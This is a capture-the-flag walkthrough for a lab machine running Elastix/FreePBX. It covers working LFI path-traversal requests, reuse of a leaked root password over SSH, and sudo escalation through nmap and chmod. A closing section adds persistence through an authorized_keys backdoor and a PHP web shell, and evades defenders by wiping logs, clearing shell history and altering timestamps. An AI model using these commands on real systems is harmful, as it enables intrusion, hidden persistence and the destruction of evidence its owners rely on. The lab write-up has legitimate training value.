Machine Synopsis#
IP Address: 10.10.10.7
Key Exploitation Techniques:
- Local File Inclusion (LFI): Exploiting a vulnerability in the
Elastixweb application to read sensitive configuration files. - SSH Credential Reuse: Using credentials found via LFI to gain a
rootshell via SSH. - Privilege Escalation: Demonstrating multiple vectors, including
sudoabuse withnmapandchmod.
1. Enumeration#
Initial reconnaissance with nmap revealed a wide range of open ports and services.
nmap -p- --min-rate 10000 10.10.10.7 -oN nmap_portscan.txt
nmap -p 22,25,80,110,143,443,3306,5038,10000 -sC -sV 10.10.10.7 -oN nmap_services.txt
Nmap Results:#
- Ports 80 & 443 (HTTP/HTTPS): The web server, running
Apache httpd 2.2.3, redirects to a login page forElastix. - Port 10000 (HTTP): A
Webminservice is running on this port, which could be another attack surface. - Port 3306 (MySQL): Database service is open.
- Port 5038 (Asterisk): The Asterisk Call Manager is available.
- Port 22 (SSH): Running
OpenSSH 4.3.
Further analysis of the web application showed that the Elastix version is FreePBX 2.10.0. This version is known to be vulnerable to several exploits.
2. Exploitation: Gaining a Root Shell#
Step 2.1: Local File Inclusion (LFI)#
We identified a Local File Inclusion (LFI) vulnerability in the vtigercrm component of Elastix. This vulnerability allows an attacker to read arbitrary files on the server by manipulating a URL parameter.
The vulnerable URL format is: https://10.10.10.7/vtigercrm/graph.php?current_language=.
We used this vulnerability to read the amportal.conf file, which is known to contain credentials for the Asterisk application and the database.
curl -k "https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00"
The output contained credentials for AMPDBUSER and AMPMGRUSER:
- AMPDBUSER:
asteriskuser - AMPMGRPASS:
jEhdIekWmdjE
Step 2.2: SSH Access with Credential Reuse#
The credentials found in amportal.conf are often reused across the system. We tested them against the SSH service on port 22, which was a success.
Note: The SSH client on modern systems may fail to connect due to the server using outdated cryptographic algorithms. The following command forces the use of a legacy key exchange algorithm.
ssh root@10.10.10.7 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss
# Enter password: jEhdIekWmdjE
After authenticating, we had a root shell, bypassing the need for a separate privilege escalation step.
id
# uid=0(root) gid=0(root) groups=0(root),1(bin),...
3. Flag Retrieval#
With a root shell, we located and retrieved both the user.txt and root.txt flags.
cat /home/fanis/user.txt
<redacted>
cat /root/root.txt
<redacted>
4. Alternative Privilege Escalation Methods#
In a scenario where initial access is gained as a low-privileged user (e.g., asterisk user via the Asterisk Manager Interface exploit), privilege escalation is necessary. The sudo -l command can list what commands a user is allowed to run with sudo without a password.
sudo -l
The output revealed that the asterisk user could run several commands as root without a password, including nmap, chmod, and yum.
Method 1: Nmap Interactive Mode#
Older versions of nmap included an interactive mode that allowed for command execution. If a user can run nmap as root via sudo, they can use this feature to get a root shell.
sudo nmap --interactive
nmap> !sh
# !sh drops us into a shell.
whoami
# root
Method 2: chmod SUID Abuse#
The sudo permissions allowed the asterisk user to run chmod as root. We can use this to set the SUID bit on a shell binary like bash, which causes it to run with the permissions of its owner (root).
sudo chmod u+s /bin/bash
/bin/bash -p
# The `-p` flag preserves the effective user ID, giving us a root shell.
whoami
# root
5. Post-Exploitation and Defense Evasion#
Persistence#
SSH Key: Add an SSH key for persistent
rootaccess.echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC..." > /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keysWeb Shell: Place a simple web shell in a web-accessible directory.
echo '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>' > /var/www/html/backdoor.php
Defense Evasion#
Log Cleanup: Clear system and web server logs to remove traces of the initial access and activity.
echo > /var/log/httpd/access_log echo > /var/log/httpd/error_log echo > /var/log/secure history -cTimestamp Manipulation: Update timestamps to match existing files.
touch -r /bin/bash /var/www/html/backdoor.php